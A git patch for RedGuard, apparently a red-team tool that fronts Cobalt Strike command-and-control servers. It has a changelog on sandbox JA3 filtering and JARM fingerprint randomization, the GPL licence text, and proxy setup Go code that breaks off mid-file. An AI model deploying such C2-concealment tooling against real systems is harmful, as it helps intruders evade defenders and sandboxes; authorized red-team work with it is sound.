From a0e5d109823b6e01ccefea034c4e7e19b734b05e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=A3=8E=E8=B5=B7?= <1402720815@qq.com> Date: Fri, 22 Jul 2022 10:43:01 +0800 Subject: [PATCH] Update RedGuard Version 22.7.22 --- CHANGELOG | 66 +- LICENSE | 676 +- README.md | 2 +- RedGuard.go | 212 +- RedGuard.log | 1080 +- cert-rsa/ca.crt | 48 +- cert-rsa/ca.key | 54 +- config/RedGuard_CobaltStrike.go | 74 +- config/version.go | 62 +- core/ProxyFilter.go | 8 + core/ProxyHandler.go | 388 +- core/arguments.go | 76 +- core/ipLookUpHelper.go | 184 +- core/parameter/options.go | 90 +- data/banned_ips.go | 40890 +++++++++++++++--------------- data/banned_ja3.go | 10 + doc/README_CN.md | 760 +- go.mod | 34 +- go.sum | 138 +- lib/CreateSSL.go | 226 +- lib/MicsSlice.go | 68 +- lib/convert.go | 118 +- lib/handle_config.go | 194 +- lib/logger.go | 64 +- lib/request.go | 98 +- 25 files changed, 22821 insertions(+), 22799 deletions(-) create mode 100644 data/banned_ja3.go diff --git a/CHANGELOG b/CHANGELOG index 1fd62a2..874e5c6 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,31 +1,35 @@ -## [22.7.21.1632] - 2022-7-21 -### Added -- Limit the maximum number of log backup files that can be generated - -## [22.7.14.1043] - 2022-7-14 -### Added -- Resolve the problem that the custom certificate is overwritten - -## [22.7.12.1111] - 2022-7-12 -### Added -- Profile Header authentication ignores case -- Disable the default JARM fingerprint randomization parameter -- Change the long version name!! -- Forward the packet XFF header so that C2 gets the real IP address -- Custom configuration file path -- Added validity verification for parameter IP input - -## [22.6.28.1712] - 2022-6-28 -### Added -- JA3 fingerprint Identify sandbox -- Code has been optimized -- Solved the problem that communication cannot be performed normally -due to the incompatibility of TLS jarm fingerprint randomize with custom certificates - -## [22.5.26.1716] - 2022-5-26 -### Added -- TLS jarm fingerprint randomize - -## [22.5.20.1220] - 2022-5-20 -### Added -- Initialize project +## [22.7.22.1036] - 2022-7-22 +### Added +- Add ThreatBook Cloud SandBox to JA3 Fingerprint Base Interception rule library + +## [22.7.21.1632] - 2022-7-21 +### Added +- Limit the maximum number of log backup files that can be generated + +## [22.7.14.1043] - 2022-7-14 +### Added +- Resolve the problem that the custom certificate is overwritten + +## [22.7.12.1111] - 2022-7-12 +### Added +- Profile Header authentication ignores case +- Disable the default JARM fingerprint randomization parameter +- Change the long version name!! +- Forward the packet XFF header so that C2 gets the real IP address +- Custom configuration file path +- Added validity verification for parameter IP input + +## [22.6.28.1712] - 2022-6-28 +### Added +- JA3 fingerprint Identify sandbox +- Code has been optimized +- Solved the problem that communication cannot be performed normally +due to the incompatibility of TLS jarm fingerprint randomize with custom certificates + +## [22.5.26.1716] - 2022-5-26 +### Added +- TLS jarm fingerprint randomize + +## [22.5.20.1220] - 2022-5-20 +### Added +- Initialize project diff --git a/LICENSE b/LICENSE index bbe0792..6eb1579 100644 --- a/LICENSE +++ b/LICENSE @@ -1,339 +1,339 @@ - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Lesser General Public License instead.) You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. - - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. -You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - RedGuard - Copyright (C) {2022} {风起} - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License along - with this program; if not, write to the Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. - -Also add information on how to contact you by electronic and paper mail. - -If the program is interactive, make it output a short notice like this -when it starts in an interactive mode: - - Gnomovision version 69, Copyright (C) year name of author - Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, the commands you use may -be called something other than `show w' and `show c'; they could even be -mouse-clicks or menu items--whatever suits your program. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the program, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the program - `Gnomovision' (which makes passes at compilers) written by James Hacker. - - {signature of Ty Coon}, 1 April 1989 - Ty Coon, President of Vice - -This General Public License does not permit incorporating your program into -proprietary programs. If your program is a subroutine library, you may -consider it more useful to permit linking proprietary applications with the -library. If this is what you want to do, use the GNU Lesser General + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + RedGuard + Copyright (C) {2022} {风起} + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + {signature of Ty Coon}, 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. \ No newline at end of file diff --git a/README.md b/README.md index fced257..d84a62e 100644 --- a/README.md +++ b/README.md @@ -41,7 +41,7 @@ You can directly download and use the compiled version, or you can download the git clone https://github.com/wikiZ/RedGuard.git cd RedGuard # You can also use upx to compress the compiled file size -go build -ldflags "-s -w" +go build -ldflags "-s -w" -trimpath # Give the tool executable permission and perform initialization operations chmod +x ./RedGuard&&./RedGuard diff --git a/RedGuard.go b/RedGuard.go index 2eb4e20..caabdb4 100644 --- a/RedGuard.go +++ b/RedGuard.go @@ -1,106 +1,106 @@ -/** - * @Author 风起 - * @contact: onlyzaliks@gmail.com - * @File: RedGuard.go - * @Time: 2022/5/4 10:44 - **/ - -package main - -import ( - "fmt" - "os" - "strings" - - "RedGuard/config" - "RedGuard/core" - "RedGuard/core/parameter" - "RedGuard/lib" -) - -var logger = lib.Logger() // logger output model - -type C2 struct { - Type string //Server interface{} -} - -type c2Action interface { - serverInit() -} - -type cobaltStrike struct { - action string -} - -// ServerInit CobaltStrike module core method entry -func (cs *cobaltStrike) serverInit() { - cs.action = "CobaltStrike" - var ( - proxy parameter.ProxyConf // Proxy configuration structure - cfg = lib.InitConfig() // config file object - num int // counting variable - ) - // HTTPS Reverse proxy SSL certificate is created - lib.InitGenerateSelfSignedCert() - for key, value := range map[string]string{ - "HTTPS": "/", - "HTTP": "/http", - } { - proxy.Action = key // Gets the reverse proxy listening port type - proxy.Pattern = value // Gets the pattern associated with the listening type - proxy.Port = lib.ReadConfig("proxy", fmt.Sprintf("Port_%s", key), cfg) - // When num is greater than 0, the main program is called out of the loop - if num > 0 { - break - } - num += 1 - logger.Noticef("HostTarget: %s", lib.ReadConfig("proxy", "HostTarget", cfg)) - // HTTP reverse proxy - go core.ProxyManger(proxy.Action, proxy.Port, proxy.Pattern) - } - // HTTPS reverse proxy - core.ProxyManger(proxy.Action, proxy.Port, proxy.Pattern) - // TODO CobaltStrike Core flow control method -} - -func (c2 C2) configInit(args *parameter.Parses) { - c2.Type = args.C2Type - // Check C2 Server type - switch strings.ToLower(c2.Type) { - case "cobaltstrike": - // CobaltStrike Server initialize method - (&cobaltStrike{}).serverInit() - } - // TODO:Development Pending for other C2 frameworks -} - -func main() { - fmt.Println(fmt.Sprintf(config.BANNER, config.VERSION, config.URL)) // output banner information. - // Create the tool argument - var ( - parse parameter.Parses // Basic parameter structure - cert parameter.Cert // Certificate configuration parameter structure - _proxy parameter.Proxy // Proxy configuration parameter structure - ) - core.CmdParse(&parse, &cert, &_proxy) - // Check whether RedGuard has been initialized - if num, isExits := lib.CreateConfig(parse.C2Type /* C2 Facility Type */, parse.ConfigPath); isExits { - switch { - case parse.Update: - lib.UpdateConfig(&cert, &_proxy) // Update RedGuard Config - logger.Notice("RedGuard Configuration file updated successfully!") - case parse.IP != "": - if lib.CheckIP(parse.IP) == false { - logger.Warning("Please enter a valid IP address") - os.Exit(0) - } - logger.Noticef("Search ipLookUpHelper: %s", parse.IP) - core.IPLookUp(parse.Location /* owning place to be verified */, parse.IP) // Query the location of an IP address - case num == 0: - // Select different C2 Server modes based on user parameters,default CobaltStrike. - (C2{}).configInit(&parse) - case num == 1: // Initialization is run for the first time - os.Exit(0) - } - } -} +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: RedGuard.go + * @Time: 2022/5/4 10:44 + **/ + +package main + +import ( + "fmt" + "os" + "strings" + + "RedGuard/config" + "RedGuard/core" + "RedGuard/core/parameter" + "RedGuard/lib" +) + +var logger = lib.Logger() // logger output model + +type C2 struct { + Type string //Server interface{} +} + +type c2Action interface { + serverInit() +} + +type cobaltStrike struct { + action string +} + +// ServerInit CobaltStrike module core method entry +func (cs *cobaltStrike) serverInit() { + cs.action = "CobaltStrike" + var ( + proxy parameter.ProxyConf // Proxy configuration structure + cfg = lib.InitConfig() // config 